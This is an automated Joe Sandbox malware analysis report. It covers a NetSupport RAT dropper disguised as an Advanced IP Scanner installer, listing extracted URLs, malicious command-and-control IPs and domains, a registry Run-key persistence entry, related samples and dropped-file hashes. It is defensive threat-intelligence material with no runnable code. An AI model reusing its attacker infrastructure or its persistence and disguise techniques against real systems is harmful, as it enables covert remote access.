                                                                                                      http://www.netsupportschool.com/tutor-assistant.aspclient32.exe, 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2034732030.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2118509299.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpfalse
                                                                                                        		high
                                                                                                        http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.1923156190.0000000006038000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://www.pci.co.uk/supportclient32.exe, 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2034732030.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2118509299.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpfalse
                                                                                                            		high
                                                                                                            https://sectigo.com/CPS0powershell.exe, 00000003.00000002.1912534174.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.1912534174.0000000004726000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.1912534174.0000000004F39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004726000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.1912534174.0000000004726000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://ocsp.thawte.com0KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004A76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://xml.org/sax/features/namespacesis-0LL3Q.tmp.1.drfalse
                                                                                                                        		high
                                                                                                                        https://contoso.com/Iconpowershell.exe, 00000003.00000002.1923156190.0000000006038000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://www.radmin.comKC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0spowershell.exe, 00000003.00000002.1912534174.0000000004A80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://geo.netsupportsoftware.com/location/loca.asp3fclient32.exe, 00000007.00000002.4096405851.00000000051C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://127.0.0.1client32.exe, client32.exe, 00000008.00000002.2034698916.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2117662309.000000001118F000.00000002.00000001.01000000.0000000B.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://www.symauth.com/cps0(KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004C18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmp, AudioCapture.dll.3.dr, pcicapi.dll.3.drfalse
                                                                                                                                    		high
                                                                                                                                    https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.1912534174.0000000004726000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tpowershell.exe, 00000003.00000002.1912534174.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://www.advanced-ip-scanner.com0KC0uZWwr8p.tmp, 00000001.00000002.1996182111.00000000010EC000.00000004.00000010.00020000.00000000.sdmp, KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, is-0LL3Q.tmp.1.dr, is-MH1O8.tmp.1.dr, is-BPHN2.tmp.1.drfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        		unknown
                                                                                                                                        http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0ypowershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://www.symauth.com/rpa00KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004C18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmp, AudioCapture.dll.3.dr, pcicapi.dll.3.drfalse
                                                                                                                                            		high
                                                                                                                                            http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#powershell.exe, 00000003.00000002.1912534174.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://qt-project.org/xml/features/report-start-end-entityis-0LL3Q.tmp.1.drfalse
                                                                                                                                                		high
                                                                                                                                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.1912534174.0000000004F39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004726000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://trolltech.com/xml/features/report-start-end-entityis-0LL3Q.tmp.1.drfalse
                                                                                                                                                    		high
                                                                                                                                                    http://geo.netsupportsoftware.com/location/loca.aspFzclient32.exe, 00000007.00000002.4096405851.00000000051C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      http://trolltech.com/xml/features/report-whitespace-only-CharDatais-0LL3Q.tmp.1.drfalse
                                                                                                                                                        		high
                                                                                                                                                        http://geo.netsupportsoftware.com/location/loca.aspNxclient32.exe, 00000007.00000002.4096405851.00000000051C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		high

                                                                                                                                                          World Map of Contacted IPs

                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                          • 75% < No. of IPs

                                                                                                                                                          Public IPs

                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                          151.236.16.15
                                                                                                                                                          		payiki.comEuropean Union
                                                                                                                                                          		29802HVC-ASUStrue
                                                                                                                                                          104.26.0.231
                                                                                                                                                          		geo.netsupportsoftware.comUnited States
                                                                                                                                                          		13335CLOUDFLARENETUSfalse
                                                                                                                                                          199.188.200.195
                                                                                                                                                          		anyhowdo.comUnited States
                                                                                                                                                          		22612NAMECHEAP-NETUStrue

                                                                                                                                                          General Information

                                                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                          Analysis ID:1552424
                                                                                                                                                          Start date and time:2024-11-08 19:01:09 +01:00
                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                          Overall analysis duration:0h 11m 33s
                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                          Report type:full
                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                          Number of analysed new started processes analysed:12
                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                          Technologies:
                                                                                                                                                          • HCA enabled
                                                                                                                                                          • EGA enabled
                                                                                                                                                          • AMSI enabled
                                                                                                                                                          Analysis Mode:default
                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                          Sample name:KC0uZWwr8p.exe
                                                                                                                                                          renamed because original name is a hash value
                                                                                                                                                          Original Sample Name:7b6e6212a6d13800282bd2cb362c2a311d89e543.exe
                                                                                                                                                          Detection:MAL
                                                                                                                                                          Classification:mal60.rans.spre.troj.evad.winEXE@10/299@3/3
                                                                                                                                                          EGA Information:
                                                                                                                                                          • Successful, ratio: 66.7%
                                                                                                                                                          HCA Information:
                                                                                                                                                          • Successful, ratio: 70%
                                                                                                                                                          • Number of executed functions: 186
                                                                                                                                                          • Number of non-executed functions: 201
                                                                                                                                                          Cookbook Comments:
                                                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                                                          Warnings

                                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                          • Execution Graph export aborted for target powershell.exe, PID 5448 because it is empty
                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                          • VT rate limit hit for: KC0uZWwr8p.exe

                                                                                                                                                          Simulations

                                                                                                                                                          Behavior and APIs

                                                                                                                                                          TimeTypeDescription
                                                                                                                                                          13:02:21API Interceptor17x Sleep call for process: powershell.exe modified
                                                                                                                                                          13:02:54API Interceptor14609360x Sleep call for process: client32.exe modified
                                                                                                                                                          18:02:28AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run NetUtilityApp C:\Users\user\AppData\Roaming\SystemUtil\client32.exe
                                                                                                                                                          18:02:36AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run NetUtilityApp C:\Users\user\AppData\Roaming\SystemUtil\client32.exe

                                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                                          IPs

                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                          151.236.16.15CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                                                          • http://151.236.16.15/fakeurl.htm
                                                                                                                                                          CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                                                          • http://151.236.16.15/fakeurl.htm
                                                                                                                                                          CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                                                          • http://151.236.16.15/fakeurl.htm
                                                                                                                                                          CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                                                          • http://151.236.16.15/fakeurl.htm
                                                                                                                                                          Advanced_IP_Scanner_2.5.4594.12.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                                                          • http://151.236.16.15/fakeurl.htm
                                                                                                                                                          Advanced_IP_Scanner_2.5.4594.12.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                                                          • http://151.236.16.15/fakeurl.htm
                                                                                                                                                          https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                                                          • http://151.236.16.15/fakeurl.htm
                                                                                                                                                          104.26.0.231hkpqXovZtS.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                          • geo.netsupportsoftware.com/location/loca.asp
                                                                                                                                                          file.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                          • geo.netsupportsoftware.com/location/loca.asp
                                                                                                                                                          qvoLvRpRbr.msiGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                          • geo.netsupportsoftware.com/location/loca.asp
                                                                                                                                                          EMX97rT0GX.msiGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                          • geo.netsupportsoftware.com/location/loca.asp
                                                                                                                                                          Support_auto.msiGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                          • geo.netsupportsoftware.com/location/loca.asp
                                                                                                                                                          SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                          • geo.netsupportsoftware.com/location/loca.asp
                                                                                                                                                          SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                          • geo.netsupportsoftware.com/location/loca.asp
                                                                                                                                                          information_package.exeGet hashmaliciousNetSupport RAT, NetSupport Downloader, Stealc, VidarBrowse
                                                                                                                                                          • geo.netsupportsoftware.com/location/loca.asp
                                                                                                                                                          updates.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                          • geo.netsupportsoftware.com/location/loca.asp
                                                                                                                                                          updates.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                          • geo.netsupportsoftware.com/location/loca.asp
                                                                                                                                                          199.188.200.195CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                                                          • http://199.188.200.195/fakeurl.htm
                                                                                                                                                          CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                                                          • http://199.188.200.195/fakeurl.htm
                                                                                                                                                          CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                                                          • http://199.188.200.195/fakeurl.htm
                                                                                                                                                          CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                                                          • http://199.188.200.195/fakeurl.htm
                                                                                                                                                          Advanced_IP_Scanner_2.5.4594.12.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                                                          • http://199.188.200.195/fakeurl.htm
                                                                                                                                                          Advanced_IP_Scanner_2.5.4594.12.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                                                          • http://199.188.200.195/fakeurl.htm
                                                                                                                                                          https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                                                          • http://199.188.200.195/fakeurl.htm

                                                                                                                                                          Domains

                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                          geo.netsupportsoftware.com72BF1aHUKl.msiGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                          • 172.67.68.212
                                                                                                                                                          hkpqXovZtS.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                          • 104.26.0.231
                                                                                                                                                          file.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                          • 104.26.1.231
                                                                                                                                                          file.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                          • 104.26.1.231
                                                                                                                                                          CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                                                          • 172.67.68.212
                                                                                                                                                          CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                                                          • 172.67.68.212
                                                                                                                                                          CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                                                          • 172.67.68.212
                                                                                                                                                          CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                                                          • 104.26.1.231
                                                                                                                                                          Advanced_IP_Scanner_2.5.4594.12.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                                                          • 104.26.1.231
                                                                                                                                                          Advanced_IP_Scanner_2.5.4594.12.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                                                          • 104.26.1.231
                                                                                                                                                          payiki.comCiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                                                          • 151.236.16.15
                                                                                                                                                          CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                                                          • 151.236.16.15
                                                                                                                                                          CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                                                          • 151.236.16.15
                                                                                                                                                          CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                                                          • 151.236.16.15
                                                                                                                                                          Advanced_IP_Scanner_2.5.4594.12.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                                                          • 151.236.16.15
                                                                                                                                                          Advanced_IP_Scanner_2.5.4594.12.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                                                          • 151.236.16.15
                                                                                                                                                          https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                                                          • 151.236.16.15
                                                                                                                                                          anyhowdo.comCiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                                                          • 199.188.200.195
                                                                                                                                                          CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                                                          • 199.188.200.195
                                                                                                                                                          CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                                                          • 199.188.200.195
                                                                                                                                                          CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                                                          • 199.188.200.195
                                                                                                                                                          Advanced_IP_Scanner_2.5.4594.12.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                                                          • 199.188.200.195
                                                                                                                                                          Advanced_IP_Scanner_2.5.4594.12.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                                                          • 199.188.200.195
                                                                                                                                                          https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                                                          • 199.188.200.195

                                                                                                                                                          ASNs

                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                          NAMECHEAP-NETUSPlay-Audio_Vmail_Ach Statement Credi....htmlGet hashmaliciousHtmlDropperBrowse
                                                                                                                                                          • 199.188.200.234
                                                                                                                                                          Play_VM_00_01_22sec-ATT212monika.hayward@bostonbeer.com.htmlGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                                                                                                          • 162.0.238.119
                                                                                                                                                          xxTupY4Fr3.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 63.250.43.10
                                                                                                                                                          RO2Y11yOJ7.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                          • 192.64.118.221
                                                                                                                                                          https://login-zendesk-account.servz.com.pkGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                          • 63.250.47.132
                                                                                                                                                          https://login-zendesk-account.servz.com.pkGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                          • 63.250.47.132
                                                                                                                                                          https://login-zendesk-account.servz.com.pkGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                          • 63.250.47.132
                                                                                                                                                          xBzBOQwywT.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                          • 199.192.19.19
                                                                                                                                                          https://google.com:login@login-zendesk-account.servz.com.pk/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                          • 63.250.47.132
                                                                                                                                                          HVC-ASUSPayload 94.75 (3).225.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 104.254.128.202
                                                                                                                                                          CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                                                          • 151.236.16.15
                                                                                                                                                          CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                                                          • 151.236.16.15
                                                                                                                                                          CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                                                          • 151.236.16.15
                                                                                                                                                          CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                                                          • 151.236.16.15
                                                                                                                                                          Advanced_IP_Scanner_2.5.4594.12.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                                                          • 151.236.16.15
                                                                                                                                                          Advanced_IP_Scanner_2.5.4594.12.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                                                          • 151.236.16.15
                                                                                                                                                          https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                                                          • 151.236.16.15
                                                                                                                                                          PO-33463334788.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                          • 23.227.202.197
                                                                                                                                                          IGNM2810202400017701_270620240801_546001.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                                                          • 66.206.22.19
                                                                                                                                                          CLOUDFLARENETUS72BF1aHUKl.msiGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                          • 172.67.68.212
                                                                                                                                                          https://nleco-my.sharepoint.com/:u:/p/smartin/EYZSur4py4xKna-WAI8lgIkBS_KVLZwaA2d1wGxZA5Gdvw?e=wwT7sTGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                                                                          • 104.18.95.41
                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 188.114.97.3
                                                                                                                                                          pago de PEDIDO PROFORMA.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                          • 104.26.12.205
                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                                          • 188.114.96.3
                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 188.114.96.3
                                                                                                                                                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                          • 172.64.41.3
                                                                                                                                                          file.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                          • 188.114.96.3
                                                                                                                                                          http://jobs.sixlfags.comGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 104.21.43.150
                                                                                                                                                          https://ascerta.aha.io/shared/edaa0f8ea0ea06d13e545667a40fae36Get hashmaliciousUnknownBrowse
                                                                                                                                                          • 104.18.94.41

                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                          No context

                                                                                                                                                          Dropped Files

                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                          C:\Program Files (x86)\Advanced IP Scanner\Qt5Gui.dll (copy)Advanced_IP_Scanner_2.5.4594.12.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                                                            Advanced_IP_Scanner_2.5.4594.12.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                                                              https://download.advanced-ip-scanner.com/download/files/Advanced_IP_Scanner_2.5.4594.1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                Advanced Scanner.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                                                                  ip_scan_en_us_Release_2.5.4594.1.msiGet hashmaliciousCobaltStrikeBrowse
                                                                                                                                                                    ipscan.msiGet hashmaliciousDarkgateBrowse
                                                                                                                                                                      Advanced_IP_Scanner.exeGet hashmaliciousDanaBotBrowse
                                                                                                                                                                        Advanced_IP_Scanner.exeGet hashmaliciousDanaBotBrowse
                                                                                                                                                                          IPAVSCAN_win_version_1.1.3.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                            Advanced_IP_Scanner_2.5.4594.1_net.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                              C:\Program Files (x86)\Advanced IP Scanner\Qt5Core.dll (copy)Advanced_IP_Scanner_2.5.4594.12.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                                                                                Advanced_IP_Scanner_2.5.4594.12.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                                                                                  https://download.advanced-ip-scanner.com/download/files/Advanced_IP_Scanner_2.5.4594.1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                    Advanced Scanner.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                                                                                      ip_scan_en_us_Release_2.5.4594.1.msiGet hashmaliciousCobaltStrikeBrowse
                                                                                                                                                                                        ipscan.msiGet hashmaliciousDarkgateBrowse
                                                                                                                                                                                          Advanced_IP_Scanner.exeGet hashmaliciousDanaBotBrowse
                                                                                                                                                                                            Advanced_IP_Scanner.exeGet hashmaliciousDanaBotBrowse
                                                                                                                                                                                              IPAVSCAN_win_version_1.1.3.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                Advanced_IP_Scanner_2.5.4594.1_net.exeGet hashmaliciousUnknownBrowse

                                                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\Advanced_IP_Scanner.ico (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 9 icons, 16x16, 16 colors, 4 bits/pixel, 16x16, 8 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):25214
                                                                                                                                                                                                  Entropy (8bit):5.181706176676903
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:gZwwfjXDaFoDU90fQNBYNK30CCl77nQ6jtCuZEaaX/bv+NZmQDtLQIRLdc8ZDeO4:qLXDTQCQNmNa0CCl77nQ6viv6t2tMA
                                                                                                                                                                                                  MD5:3511FCBA762713FBC4D83979F300A383
                                                                                                                                                                                                  SHA1:61C33483A70C253FF38222021AD05E599F11E05C
                                                                                                                                                                                                  SHA-256:AD6B11E0F7B0E9DDD0B3440AA0C9308F18E385C7EBB78452A964F77A104B789E
                                                                                                                                                                                                  SHA-512:2CA49AE53A97FDD8AA857DFFFF281501506BAC8BD6B0D76B94CDA65592492A7DAA29FEC2CFD912DDBDCDEDEFF104BD21B00B2DED958C8BA7567536AFABE4D639
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:..............(...............h....... ..........&... ..............00......h.......00.................... .h....'.. .... ......,..00.... ..%...<..(....... ...............................................................................................0...33..;...;.....ffo..6...3...o...`...o...`...o...`...o...`...o...o.......ww...ffn......n.......n.......fffg.................................................................................(....... ...........@.......................B...!{..cs..{{{.sss.{sk..s...Z...c..{ss.1...9......................9...s....R..............)...!{...1..{....9.................B....B................{..!........J.........{)...s..........k...........{c..B.................!..)...B...9.....................{...c...R...!......1...1.......................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\Qt5Core.dll (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5987880
                                                                                                                                                                                                  Entropy (8bit):6.645849589307296
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:98304:I9HgaLmICbZhV8cBfAVG4F40zkpEJsv6tWKFdu9CcDo+fN4A:I9Hgaq5b7OcBfAVG4FiEJsv6tWKFdu9V
                                                                                                                                                                                                  MD5:C2BB94B2C229ECE69D865B1898C71324
                                                                                                                                                                                                  SHA1:AFAC1A2FEDE68AD129BB48B01ED8B80997F75D2F
                                                                                                                                                                                                  SHA-256:193814D47E0B7917C3373011F64CD3AC649A16D1D0515C9D409FA1794C5BFFB1
                                                                                                                                                                                                  SHA-512:2CB31EB8FD866510268553B77D2BB4DDFFB4D48F22C35B8679933CB48AC7B90DE1AEFCF6132DBCEF007F6F622869C931BE13A5D41234E49E0C7DB3F8C5CF8B0A
